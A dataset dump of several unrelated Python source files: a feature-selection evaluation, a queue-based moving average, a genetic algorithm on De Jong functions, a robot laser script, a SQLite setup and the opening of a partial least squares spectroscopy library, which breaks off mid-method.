index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
993,500 | dc2427655490bc3521cad798225289acaabf3ce5 | import pandas as pd
from evaluation import features, evaluation
datasets = [
"wine.csv",
"ionosphere.csv",
"movement_libras.csv",
"SCADI.csv",
"parkinsons.csv",
# "sonar.csv",
# "vehicle.csv"
]
solutions = [
[0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0]
]
for i in range(len(datasets)):
filename = "datasets/" + datasets[i]
dataset = pd.read_csv(filename)
y = dataset.iloc[:,0].to_numpy()
x = dataset.iloc[:,1:].to_numpy()
lambda_ = 10 ** (-1*(len(str(len(x[0])))))
x_best = features(x,solutions[i])
fit, acc = evaluation(x_best,y,lambda_,k=1)
print("\n{} best : Accuracy = {}%\n".format(datasets[i],round(acc*100,2)))
print() |
993,501 | e0e7b98e72fa47b146e749f39f0cb343a52e14c8 |
# 스트리밍 데이터의 이동 평균
#
# 정수 데이터가 스트리밍으로 (한번에 하나씩) 주어진다고 합시다. 이때, 주어진 범위 만큼의 이동 평균을 구하는 클래스 MovingAvg를 만들어 봅시다.
#
# MovingAvg는 처음에 이동 평균의 범위를 입력받아서 초기화 되며, 매 정수 데이타가 입력되는 nextVal(num)함수는 이때까지의 이동 평균을 반환합니다.
#
# 예를 들어서, 2,8,19,37,4,5 의 순서로 데이터가 입력되고, 이동 평균의 범위는 3이라고 합시다. 이 경우 다음과 같이 MovingAvg가 사용 될 것입니다.
# ma = MovingAvg(3)
# print(ma.nextVal(2))
# 현재까지 입력된 값이 2밖에 없으므로, 2를 반환합니다.
import queue
# 1. 배열을 큐로 활용
# 시간 복잡도 : O(N)
# class MovingAvg():
# def __init__(self, size):
# self.size = size
# self.lst = []
#
# def nextVal(self, num):
# self.lst.insert(0, num)
# if len(self.lst) > self.size:
# self.lst.pop()
#
# return sum(self.lst) / len(self.lst)
# 2. 매번 sum() 해줄 필요 없이 시작, 끝의 갑을 뺴고 더해주는 sum 변수를 만듬
# class MovingAvg():
# def __init__(self, size):
# self.size = size
# self.lst = []
# self.sum = 0
#
# def nextVal(self, num):
# self.lst.insert(0, num)
# self.sum += num
# if len(self.lst) > self.size:
# popNumber = self.lst.pop()
# self.sum -= popNumber
#
# return self.sum / len(self.lst)
# queue 라이브러리 사용
class MovingAvg():
def __init__(self, size):
self.size = size
self.q = queue.Queue()
self.sum = 0
def nextVal(self, num):
self.q.put(num)
self.sum += num
if self.q.qsize() > self.size:
popNumber = self.q.get()
self.sum -= popNumber
return self.sum / self.q.qsize()
def queueExample():
q = queue.Queue()
q.put(5)
q.put(9)
print(q.qsize())
print(q.get())
print(q.qsize())
print(q.get())
def main():
queueExample()
nums = [2, 8, 19, 37, 4, 5]
ma = MovingAvg(3)
results = []
for num in nums:
avg = ma.nextVal(num)
results.append(avg)
print(results) # [2.0, 5.0, 9.666666666666666, 21.333333333333332, 20.0, 15.333333333333334]
if __name__ == "__main__":
main() |
993,502 | f901f6a5d586bc716d36f18d66c936b719a7fe4f | ###################################################################################################################################################
# filename: ga.py
# author: Sara Davis
# date: 10/1/2018
# version: 1.0
# description: Generic Genetic Algorithm
###################################################################################################################################################
import random
import numpy as np
import sys
from numpy.random import choice
import csv
np.set_printoptions(threshold=sys.maxsize)
import matplotlib.pyplot as plt
###########################################################################################################
# def generate_chromosome()
# Generate a 16 random 0's or 1's, return that as the chromosome
# inputs: X, K
# returns: centers (cluster centers)
############################################################################################################
def generate_chromosome():
temp = []
for i in range(16):
val = random.randint(0, 1)
#print(val)
temp.append(val)
return np.asarray(temp)
###########################################################################################################
# def generate_individual(num_chain)
# Chain together a series of chromosomes to form an individual
# inputs: num_chain
# returns: individual
############################################################################################################
def generate_individual(num_chain):
temp = []
for j in range (num_chain):
temp.append(generate_chromosome())
individual = np.asarray(temp).reshape(16*num_chain)
return individual
###########################################################################################################
# def generate_population1()
# Generate an individual with 3 chained chromosomes, and form a population of 100
# inputs: None
# returns: population
############################################################################################################
def generate_population1():
pop = []
for i in range(100):
ind= generate_individual(3)
pop.append(ind)
population=np.asarray(pop)
return population
###########################################################################################################
# def generate_population1()
# Generate an individual with 2 chained chromosomes, and form a population of 100
# inputs: None
# returns: population
############################################################################################################
def generate_population2():
pop = []
for i in range(100):
ind= generate_individual(2)
pop.append(ind)
population=np.asarray(pop)
return population
###########################################################################################################
# def generate_population1()
# Generate an individual with 5 chained chromosomes, and form a population of 100
# inputs: None
# returns: population
############################################################################################################
def generate_population3():
pop = []
for i in range(100):
ind= generate_individual(5)
# print(len(ind))
pop.append(ind)
# print(pop)
population=np.asarray(pop)
return population
###########################################################################################################
# def generate_population1()
# Generate an individual with 30 chained chromosomes, and form a population of 100
# inputs: None
# returns: population
############################################################################################################
def generate_population4():
pop = []
for i in range(100):
ind= generate_individual(30)
pop.append(ind)
population=np.asarray(pop)
return population
###########################################################################################################
# def calculate_first_dejong(population)
# Use the first dejong funciton to evaluate the fitness of the chromosome
# inputs: population
# returns: sumall
############################################################################################################
def calculate_first_dejong(population):
#print(population[:, :16])
chrom1 = population[:, :16].dot(2**np.arange(population[:, :16].shape[1])[::-1])
chrom2 = population[:, 17:32].dot(2**np.arange(population[:, 17:32].shape[1])[::-1])
chrom3 = population[:, 33:].dot(2**np.arange(population[:, 33:].shape[1])[::-1])
chrom1 = 5.12 * 2 / (2**16) * chrom1 -5.12
chrom2 = 5.12 * 2 / (2**16) * chrom2 -5.12
chrom3 = 5.12 * 2 / (2**16) * chrom3 -5.12
sumAll = 81 - (chrom1 * chrom1 + chrom2* chrom2 + chrom3*chrom3)
return sumAll
###########################################################################################################
# def calculate_second_dejong(population)
# Use the second dejong funciton to evaluate the fitness of the chromosome
# inputs: population
# returns: val
############################################################################################################
def calculate_second_dejong(population):
#print(population[:, :16])
chrom1 = population[:, :16].dot(2**np.arange(population[:, :16].shape[1])[::-1])
chrom2 = population[:, 17:32].dot(2**np.arange(population[:, 17:32].shape[1])[::-1])
chrom1 = 2.048 * 2 / (2**16) * chrom1 - 2.048
chrom2 = 2.048 * 2 / (2**16) * chrom2 - 2.048
val =3906-( (100*(chrom1 **2- chrom2) **2) + (1-chrom1)**2)
#was 420
return val
###########################################################################################################
# def calculate_third_dejong(population)
# Use the third dejong funciton to evaluate the fitness of the chromosome
# inputs: population
# returns: sumAll
############################################################################################################
def calculate_third_dejong(population):
#print(population[:, :16])
chrom1 = population[:, :16].dot(2**np.arange(population[:, :16].shape[1])[::-1])
chrom2 = population[:, 16:32].dot(2**np.arange(population[:, 16:32].shape[1])[::-1])
chrom3 = population[:, 32:48].dot(2**np.arange(population[:, 32:48].shape[1])[::-1])
chrom4 = population[:, 48:64].dot(2**np.arange(population[:, 48:64].shape[1])[::-1])
chrom5 = population[:, 64:].dot(2**np.arange(population[:, 64:].shape[1])[::-1])
# print(population[:, 48:54])
# print(population[:, 54:])
#print(chrom4)
# print(len(chrom5[0]))
chrom1 = 5.12 * 2 / (2**16) * chrom1 - 5.12
chrom2 = 5.12 * 2 / (2**16) * chrom2 - 5.12
chrom3 = 5.12 * 2 / (2**16) * chrom3 - 5.12
chrom4 = 5.12 * 2 / (2**16) * chrom4 - 5.12
chrom5 = 5.12 * 2 / (2**16) * chrom5 - 5.12
#print(chrom1)
#print(chrom2)
#print(chrom3)
#print(chrom4)
#print(chrom5)
sumAll = 26 + (chrom1.astype(int) + chrom2.astype(int) + chrom3.astype(int) + chrom4.astype(int) + chrom5.astype(int))
#print(sumAll)
return sumAll.astype(float)
###########################################################################################################
# def calculate_fourth_dejong(population)
# Use the fourth dejong funciton to evaluate the fitness of the chromosome
# inputs: population
# returns: sumAll
############################################################################################################
def calculate_fourth_dejong(population):
#NP.RANDOM.RANDN
#print(len(population[0]))
chrom1 = population[:, :16].dot(2**np.arange(population[:, :16].shape[1])[::-1])
chrom2 = population[:, 17:32].dot(2**np.arange(population[:, 17:32].shape[1])[::-1])
chrom3 = population[:, 33:48].dot(2**np.arange(population[:, 33:48].shape[1])[::-1])
chrom4 = population[:, 49:54].dot(2**np.arange(population[:, 49:54].shape[1])[::-1])
chrom5 = population[:, 55:70].dot(2**np.arange(population[:, 55:70].shape[1])[::-1])
chrom6 = population[:, 71:86].dot(2**np.arange(population[:, 71:86].shape[1])[::-1])
chrom7 = population[:, 87:102].dot(2**np.arange(population[:, 87:102].shape[1])[::-1])
chrom8 = population[:, 103:118].dot(2**np.arange(population[:, 103:118].shape[1])[::-1])
chrom9 = population[:, 119:134].dot(2**np.arange(population[:, 119:134].shape[1])[::-1])
chrom10 = population[:, 135:150].dot(2**np.arange(population[:, 135:150].shape[1])[::-1])
chrom11 = population[:, 151:166].dot(2**np.arange(population[:, 151:166].shape[1])[::-1])
chrom12 = population[:, 167:182].dot(2**np.arange(population[:, 167:182].shape[1])[::-1])
chrom13 = population[:, 183:198].dot(2**np.arange(population[:, 183:198].shape[1])[::-1])
chrom14 = population[:, 199:214].dot(2**np.arange(population[:, 199:214].shape[1])[::-1])
chrom15 = population[:, 215:231].dot(2**np.arange(population[:, 215:231].shape[1])[::-1])
chrom16 = population[:, 232:247].dot(2**np.arange(population[:, 232:247].shape[1])[::-1])
chrom17 = population[:, 248:263].dot(2**np.arange(population[:, 248:263].shape[1])[::-1])
chrom18 = population[:, 264:279].dot(2**np.arange(population[:, 264:279].shape[1])[::-1])
chrom19 = population[:, 280:295].dot(2**np.arange(population[:, 280:295].shape[1])[::-1])
chrom20 = population[:, 296:311].dot(2**np.arange(population[:, 296:311].shape[1])[::-1])
chrom21 = population[:, 312:327].dot(2**np.arange(population[:, 312:327].shape[1])[::-1])
chrom22 = population[:, 328:343].dot(2**np.arange(population[:, 328:343].shape[1])[::-1])
chrom23 = population[:, 344:359].dot(2**np.arange(population[:, 344:359].shape[1])[::-1])
chrom24 = population[:, 360:375].dot(2**np.arange(population[:, 360:375].shape[1])[::-1])
chrom25 = population[:, 376:391].dot(2**np.arange(population[:, 376:391].shape[1])[::-1])
chrom26 = population[:, 392:407].dot(2**np.arange(population[:, 392:407].shape[1])[::-1])
chrom27 = population[:, 408:423].dot(2**np.arange(population[:, 408:423].shape[1])[::-1])
chrom28 = population[:, 424:439].dot(2**np.arange(population[:, 424:439].shape[1])[::-1])
chrom29 = population[:, 440:455].dot(2**np.arange(population[:, 440:455].shape[1])[::-1])
chrom30 = population[:, 456:471].dot(2**np.arange(population[:, 456:471].shape[1])[::-1])
chrom1 = np.power(1.28* 2 / (2**16) * chrom1 -1.28, 4)
chrom2 = 2*np.power(1.28 * 2 / (2**16) * chrom2-1.28, 4)
chrom3 = 3*np.power(1.28 * 2 / (2**16) * chrom3-1.28 , 4)
chrom4 = 4*np.power(1.28 * 2 / (2**16) * chrom4-1.28, 4)
chrom5 = 5*np.power(1.28 * 2 / (2**16) * chrom5-1.28, 4)
chrom6 = 6*np.power(1.28* 2 / (2**16) * chrom6-1.28, 4 )
chrom7 = 7*np.power(1.28 * 2 / (2**16) * chrom7-1.28, 4)
chrom8 = 8*np.power(1.28 * 2 / (2**16) * chrom8-1.28, 4 )
chrom9 = 9*np.power(1.28 * 2 / (2**16) * chrom9-1.28, 4)
chrom10 = 10*np.power(1.28 * 2 / (2**16) * chrom10-1.28, 4 )
chrom11 = 11*np.power(1.28* 2 / (2**16) * chrom11-1.28, 4)
chrom12 = 12*np.power(1.28 * 2 / (2**16) * chrom12-1.28, 4)
chrom13 = 13*np.power(1.28 * 2 / (2**16) * chrom13-1.28, 4)
chrom14 = 14*np.power(1.28 * 2 / (2**16) * chrom14-1.28, 4)
chrom15 = 15*np.power(1.28 * 2 / (2**16) * chrom15-1.28, 4)
chrom16 = 16*np.power(1.28* 2 / (2**16) * chrom16-1.28, 4)
chrom17 = 17*np.power(1.28 * 2 / (2**16) * chrom17-1.28, 4)
chrom18 = 18*np.power(1.28 * 2 / (2**16) * chrom18-1.28, 4)
chrom19 = 19*np.power(1.28 * 2 / (2**16) * chrom19-1.28, 4)
chrom20 =20* np.power(1.28 * 2 / (2**16) * chrom20-1.28, 4)
chrom21 = 21* np.power(1.28* 2 / (2**16) * chrom21-1.28, 4)
chrom22 = 22* np.power(1.28 * 2 / (2**16) * chrom22-1.28, 4)
chrom23 = 23* np.power(1.28 * 2 / (2**16) * chrom23-1.28, 4)
chrom24 = 24* np.power(1.28 * 2 / (2**16) * chrom24-1.28, 4)
chrom25 = 25*np.power(1.28 * 2 / (2**16) * chrom25-1.28, 4)
chrom26 = 26*np.power(1.28* 2 / (2**16) * chrom26-1.28, 4)
chrom27 = 27*np.power(1.28 * 2 / (2**16) * chrom27-1.28, 4)
chrom28 = 28*np.power(1.28 * 2 / (2**16) * chrom28-1.28, 4)
chrom29 = 29*np.power(1.28 * 2 / (2**16) * chrom29-1.28, 4)
chrom30 = 30*np.power(1.28 * 2 / (2**16) * chrom30-1.28, 4)
#print(chrom1)
#val = np.random.randn(100, 30)
#print(val)
sumAll = 1250 - ((chrom1 + chrom2+chrom3+chrom4+chrom5+chrom6+chrom7+chrom8+chrom9+chrom10+chrom11+chrom12+chrom13+chrom14+chrom15+chrom16+chrom17+chrom18+chrom19+chrom20+chrom21+chrom22+chrom23+chrom24+chrom25+chrom26+chrom27+chrom28+chrom29+chrom30)) #+ np.random.randn(0,1))
#print(sumAll)
return sumAll
###########################################################################################################
# def proportional_distribution(population, sumAll)
# calculate the proportional distribution selection
# inputs: population, sumAll
# returns: newPop
############################################################################################################
def proportional_distribution(population, sumAll):
total = np.sum(sumAll)
probs = sumAll / total
p = list(probs)
l = []
for i in range(100):
l.append(i)
chosen = []
for i in range(len(l)):
chosen.append(choice(l, p = p))
newPop = []
for i in range(len(chosen)):
newPop.append(population[chosen[i], :])
newPop = np.asarray(newPop)
return newPop
###########################################################################################################
# def crossover(population, rate)
# Perform crossover
# inputs: population, sumAll
# returns: l
############################################################################################################
def crossover(population, rate):
l = []
for i in range(100):
if i % 2 == 0:
c = choice([0,1], p=[1-rate, rate])
if c ==1:
val = random.randint(2, 46)
chunk1a = population[i, :val]
chunk1b = population[i, val:]
chunk2a = population[i+1, :val]
chunk2b = population[i+1, val:]
chrom1 = np.concatenate((chunk1a, chunk2b), None)
chrom2 = np.concatenate((chunk2a, chunk1b), None)
else:
chrom1 = population[i]
chrom2 = population[i+1]
l.append(chrom1)
l.append(chrom2)
return np.asarray(l)
###########################################################################################################
# def mutate(population, rate)
# Perform mutation
# inputs: population, rate
# returns: mutPop
############################################################################################################
def mutate(population, rate):
mutPop = population
for i in range(100):
for j in range(len(population[0])):
#print(i,j)
c= choice([0,1], p=[1-rate, rate])
if c == 1:
if mutPop[i, j] == 0:
mutPop[i, j] =1
else:
mutPop[i, j]= 0
return mutPop
###########################################################################################################
# def calculate(sumAll, e, avMin, avAv, avMax)
# Calculate the statistics
# inputs: sumAll, e, avMin, avAv, avMax
# returns: nothing
############################################################################################################
def calculate(sumAll, e, avMin, avAv, avMax):
if len(avAv) < 50:
avMin.append(np.min(sumAll))
avMax.append(np.max(sumAll))
avAv.append(np.mean(sumAll))
else:
avMin[e] +=np.min(sumAll)
avMax[e] +=np.max(sumAll)
avAv[e] +=np.mean(sumAll)
###########################################################################################################
# def average(avMin, avMax, avAv)
# Calculate averages
# inputs: avMin, avMax, avAv
# returns: nothing
############################################################################################################
def average(avMin, avMax, avAv):
for i in range(len(avMax)):
avMin[i] = avMin[i] / 30
avMax[i] = avMax[i] /30
avAv[i] = avAv[i] /30
###########################################################################################################
# def plot(avMin, avMax, avAv, px, pm, dejong)
# plot stuff
# inputs: avMin, avMax, avAv, px, pm, dejong
# returns: nothing
############################################################################################################
def plot(avMin, avMax, avAv, px, pm, dejong):
x_axis = []
for i in range(1, 51):
x_axis.append(i)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(x_axis, avMin, label= 'Av Min')
ax.plot(x_axis, avMax, label= 'Av Max')
ax.plot(x_axis, avAv, label = 'Av Av')
#ax.plot(x_axis, m, label= 'True Max')
plt.xlabel('Generation')
plt.ylabel('Average Fitness')
plt.title(dejong + 'Fitnesses Px: ' + str(px) + ' Pm: ' + str(pm))
plt.legend()
plt.show()
###########################################################################################################
# def first(pop)
# run first dejong
# inputs: pop
# returns: nothing
############################################################################################################
def first(pop):
with open('first_dejong.csv', mode='w') as write:
writer = csv.writer(write, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
#print("1")
run = 0
px = [.7, .7, .7, .3, 1]
pm =[.001, .01, .0001, .001, .001]
avMin =[]
avAv= []
avMax=[]
for i in range(len(px)):
#print("2)")
while run < 30:
#print("3")
e = 0
val = 1
while e < 50:
#print("4")
sumAll =calculate_first_dejong(pop)
calculate(sumAll, e, avMin, avAv, avMax)
writer.writerow([e] + [px[i]] +[pm[i]])
writer.writerow(sumAll)
val = sumAll[1]
#print(sumAll)
pop = proportional_distribution(pop, sumAll)
pop=crossover(pop, px[i])
pop = mutate(pop, pm[i])
e +=1
writer.writerow([])
run +=1
average(avMin, avMax, avAv)
#print(avMin)
#print(avAv)
#print(avMax)
plot(avMin, avMax, avAv, px[i], pm[i], 'Dejong 1 ')
###########################################################################################################
# def second(pop)
# run second dejong
# inputs: pop
# returns: nothing
############################################################################################################
def second(pop):
with open('second_dejong.csv', mode='w') as write:
writer = csv.writer(write, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
run = 0
px = [.7, .7, .7, .3, 1.00]
pm =[.001, .01, .0001, .001, .001]
avMin =[]
avAv= []
avMax=[]
for i in range(len(px)):
while run < 30:
e = 0
while e < 50:
sumAll =calculate_second_dejong(pop)
#print(sumAll)
calculate(sumAll, e, avMin, avAv, avMax)
writer.writerow([e] + [px[i]] +[pm[i]])
writer.writerow(sumAll)
pop = proportional_distribution(pop, sumAll)
pop=crossover(pop, px[i])
pop = mutate(pop, pm[i])
e +=1
run +=1
average(avMin, avMax, avAv)
#print(avMin)
#print(avAv)
#print(avMax)
plot(avMin, avMax, avAv, px[i], pm[i], 'Dejong 2 ')
###########################################################################################################
# def third(pop)
# run third dejong
# inputs: pop
# returns: nothing
############################################################################################################
def third(pop):
with open('third_dejong.csv', mode='w') as write:
writer = csv.writer(write, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
run = 0
px = [.7, .7, .7, .3, 1]
pm =[.001, .01, .0001, .001, .001]
avMin =[]
avAv= []
avMax=[]
for i in range(len(px)):
while run < 30:
e = 0
while e < 50:
sumAll =calculate_third_dejong(pop)
calculate(sumAll, e, avMin, avAv, avMax)
writer.writerow([e] + [px[i]] +[pm[i]])
writer.writerow(sumAll)
pop = proportional_distribution(pop, sumAll)
pop=crossover(pop, px[i])
pop = mutate(pop, pm[i])
e +=1
run +=1
average(avMin, avMax, avAv)
#print(avMin)
#print(avAv)
#print(avMax)
plot(avMin, avMax, avAv, px[i], pm[i], 'Dejong 3 ')
###########################################################################################################
# def fourth(pop)
# run fourth dejong
# inputs: pop
# returns: nothing
############################################################################################################
def four(pop):
with open('four_dejong.csv', mode='w') as write:
writer = csv.writer(write, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
run = 0
px = [.7, .7, .7, .3, 1]
pm =[.001, .01, .0001, .001, .001]
avMin =[]
avAv= []
avMax=[]
for i in range(len(px)):
while run < 30:
e = 0
while e < 50:
sumAll =calculate_fourth_dejong(pop)
calculate(sumAll, e, avMin, avAv, avMax)
writer.writerow([e] + [px[i]] +[pm[i]])
writer.writerow(sumAll)
pop = proportional_distribution(pop, sumAll)
pop=crossover(pop, px[i])
pop = mutate(pop, pm[i])
e +=1
run +=1
average(avMin, avMax, avAv)
#print(avMin)
#print(avAv)
#print(avMax)
plot(avMin, avMax, avAv, px[i], pm[i], 'Dejong 4 ')
def main():
pop=generate_population1()
first(pop)
pop = generate_population2()
second(pop)
pop= generate_population3()
third(pop)
pop = generate_population4()
four(pop)
if __name__ == "__main__":
main()
|
993,503 | 6401f65be4227670e04e8e5cf200f26968afabe9 | from robot_control_class import RobotControl
rc = RobotControl()
num = int(input("Enter a number between 0 and 719 "))
laser = rc.get_laser(num)
print("Laser distance is %d meters" % laser)
|
993,504 | 8cd6a154eb819bfab0d0491f187cf7befb6dddb2 | import sqlite3
conn = sqlite3.connect('db.sqlite3')
print ("Opened database successfully")
conn.execute('CREATE TABLE computers (id INTEGER PRIMARY KEY,brand TEXT)')
conn.close() |
993,505 | 342e6801da125e5fc8fedcf3124c4f52ceb5bc8b | # -*- coding: utf-8 -*-
"""
@author: JiangSu
Email: jiangsukust@163.com
============================= pypls =============================
Provides
1. PartialLeastSquares(CrossValidation, ValsetValidation, Prediction)
-- CrossValidation, cv
-- ValsetValidation, vv
-- Prediction, predict
++ It should be pointed out that before using 'predict', 'cv' or 'vv' must be run first.
Take 'cv' for example, its outputs include 'cv_result' and 'cal_result'.
Assume the DataSet consists of 80 spectra, 700 wavelength points, the max num of latent variable is 5.
The cal_result's outputs are as following:
'cal_result' including:
'b': (回归系数,(700,5))
't2_limit': (t2阈值,(6,5))
'leverage_limit': (杠杆值阈值,(5,))
'q_limit': (Q残差阈值,(6,5),最后一列nan)
't_critical_value': (y学生化残差阈值,(6,5))
'r2': (决定系数R2,(5,))
'press': (预测残差平方和,(5,))
'rmsec': (RMSEC校正均方根误差,(5,))
'sec': (SEC校正标准偏差,(5,))
'rpd': (RPD,(5,))
'bias': (Bias,(5,))
'x_loadings': (X载荷,(700,5))
'x_scores_weights': (X权重,(700,5))
'linear_regression_coefficient': (包含斜率Slope和截距Offset,(2,5))
'fitting_x_list': (list, 每个元素代表1个隐变量下的拟合光谱矩阵)
'residual_matrix_list': (list, 每个元素代表1个隐变量下的残差光谱矩阵)
'fit_value': (拟合值,(80,5))
'y_residual': (拟合残差,(80,5))
'x_residual': (X残差,(80,5))
't2': (T2,(80,5))
'leverage': (Leverage,(80,5))
'x_scores': (X得分,(80,5))
'x_fvalue': (X残差F分布统计量,(80,5))
'x_fprob': (X残差F分布累积概率值,(80,5))
'y_fvalue': (y残差F分布统计量,(80,5))
'y_fprob': (y残差F分布累积概率值,(80,5))
'y_tvalue': (y学生化残差,(80,5)) # 学生化残差
'x_sample_residuals': (80,5)
'x_variable_residuals': (700,5)
'x_total_residuals': (1,5)
'explained_x_sample_variance': (80,5)
'explained_x_variable_variance': (700,5)
'explained_x_total_variance': (1,5)
'explained_x_variance_ratio': (1,5)
'x_outlier_indices_list':
'y_outlier_indices_list':
'just_x_outlier_list':
'just_y_outlier_list':
'both_xy_outlier_list':
2. Three PLS Algorithm:
-- Improved Kernel Partial Least Squares, IKPLS
-- Nonlinear Iterative Partial Least Squares,NIPALS
-- Straightforward Implementation of a statistically inspired Modification of the Partial Least Squares, SIMPLS
3. Several Sampling Algorithm:
-- montecarlo_sampling
-- ks_sampling(Kennard-Stone)
-- spxy_sampling
4. Several Samples split Algorithm:
-- samples_systematic_split
-- samples_ks_split
-- samples_spxy_split
-- samples_random_split
5. Popular Pretreat methods for Spectroscopy
-- Multiplicative Scatter Correction 多元散射校正, MSC
-- Multiplicative Scatter Correction + Savitzky-Golay 多元散射校正+求导, MSCSG
-- Vector Normalization 矢量归一化, VN
-- Standard Normal Variate transformation 标准正态变换, SNV
-- Eliminate Constant Offset 消除常数偏移量, ECO
-- Subtract Straight Line 减去一条直线, SSL
-- De-Trending 去趋势, DT
-- Min-Max Normalization 最小最大归一化, MMN
-- Savitzky-Golay 平滑与求导, SG
-- SNV + Savitzky-Golay, SNVSG
-- SNV + DT, SNVDT
-- SSL + SG, SSLSG
-- Mean Centering 均值中心化, MC
-- Zscore Standardization 标准化, ZS
"""
import numpy as np
from numpy import diag, cumsum, where, dot, outer, zeros, sqrt, mean, sum, min, square, inner
from numpy.linalg import inv, norm
import scipy.stats as sps
from scipy.spatial.distance import pdist, squareform
# ================ PartialLeastSquares Class (Main)================
class PartialLeastSquares(object):
'''
Including 3 important functions, which are 'cv'(CrossValidation), 'vv'(ValsetValidation) and 'predict'(Prediction).
It should be pointed out that before 'predict', 'cv' or 'vv' must be run first.
'''
def __init__(self,
algorithm='ikpls_algorithm',
max_nlv=10,
pretreat_method1='SG',
pretreat_params1=None,
pretreat_method2='MC',
customized_regions=[[4000,6000], [5000, 8000]]
):
self.algorithm = algorithm
self.max_nlv = max_nlv
self.pretreat_method1 = pretreat_method1
if pretreat_params1 is None:
self.pretreat_params1 = {}
else:
self.pretreat_params1 = pretreat_params1
if pretreat_method1 is None:
self.pretreat_params1 = {}
self.pretreat_method2 = pretreat_method2
self.customized_regions = customized_regions
self.significance_level = [0.001, 0.005, 0.01, 0.05, 0.1, 0.25]
return
def _sec_calc(self, fit_value, reference_value):
'''
只能用于Calibration时,拟合值与参考值。只能用于实例内部
不能用于交叉验证
:param fit_value:
:param reference_value:
:param nlv:
:param ifmc:
:return:
'''
if fit_value.ndim == 1:
fit_value = fit_value[:, np.newaxis] # 如果一维数组,增加至二维数组
if reference_value.ndim == 1:
reference_value = reference_value[:, np.newaxis] # 如果一维数组,增加至二维数组
max_nlv = fit_value.shape[1]
n_samples = reference_value.shape[0]
error = fit_value - reference_value
# Error Sum of Squares(SSE)
press = np.sum(error * error, axis=0)
rmsec = sqrt(press / n_samples)
# Total Sum Of Squares(SST) 总离差平方和
sst = np.sum((reference_value - mean(reference_value)) ** 2)
# Regression Sum of Squares(SSR) (1, 10)
ssr = np.sum((fit_value - mean(reference_value)) ** 2, axis=0)
# SST = SSR + SSE
# r2 = ssr / sst = 1 - sse / sst
# r2 = ssr / sst
r2 = 1 - press / sst
sd = sqrt(sst / (n_samples - 1)) # 参考值的标准偏差
# sd = np.std(reference_value, axis=0, ddof=1)
bias = np.mean(error, axis=0)
# ------------- 数据线性回归(横坐标reference_value, 纵坐标fit_value)
# linear_regression_coefficient (2, max_nlv) slope, intercept
linear_regression_coefficient = zeros((2, max_nlv))
# -------------- 校正标准误差 SEC (Standard Error of Calibration, 与自由度有关)
sec = zeros(self.max_nlv)
for i in range(self.max_nlv):
nlv = i + 1
if self.pretreat_method2 is not None:
df = n_samples - nlv - 1
else:
df = n_samples - nlv
e = error[:, i]
sec_lv = sqrt(np.sum(e * e, axis=0) / df)
sec[i] = sec_lv
reg_coeff = lsr(reference_value, fit_value[:, i], order=1)['regression_coefficient']
linear_regression_coefficient[:, i] = reg_coeff.ravel()
# ------------ 预测标准误差 SEP (Standard Error of Prediction) refer to OPUS, User friendly
SEP = sqrt((np.sum((error - bias) * (error - bias), axis=0)) / (n_samples - 1))
rpd = sd / SEP
relative_error = np.abs(error) / reference_value
return {'r2': r2, 'rmsec': rmsec, 'sep': SEP, 'sec': sec, 'press': press, 'rpd': rpd, 'bias': bias,
'linear_regression_coefficient': linear_regression_coefficient,
'relative_error': relative_error}
def _spec_target_pretreat(self, spec, target):
# ----------------- pretreat1 -----------------
if self.pretreat_method1 is not None:
self.pretreat4spec1 = eval(self.pretreat_method1.upper())(**self.pretreat_params1) # 类的实例
spec_pretreated1 = self.pretreat4spec1.fit_transform(spec)
else:
self.pretreat4spec1 = 'None'
spec_pretreated1 = spec
# 保存pretreat1预处理完的光谱的mean和stdev 为未知样本的pretreat2预处理做准备
self.calx_pretreated1_mean = np.mean(spec_pretreated1[1:, :], axis=0)
self.calx_pretreated1_stdev = np.std(spec_pretreated1[1:, :] - self.calx_pretreated1_mean, axis=0, ddof=1)
# 保存y的mean和stdev
self.caly_mean = np.mean(target, axis=0)
caly_mc = target - self.caly_mean
self.caly_stdev = np.std(caly_mc, axis=0, ddof=1)
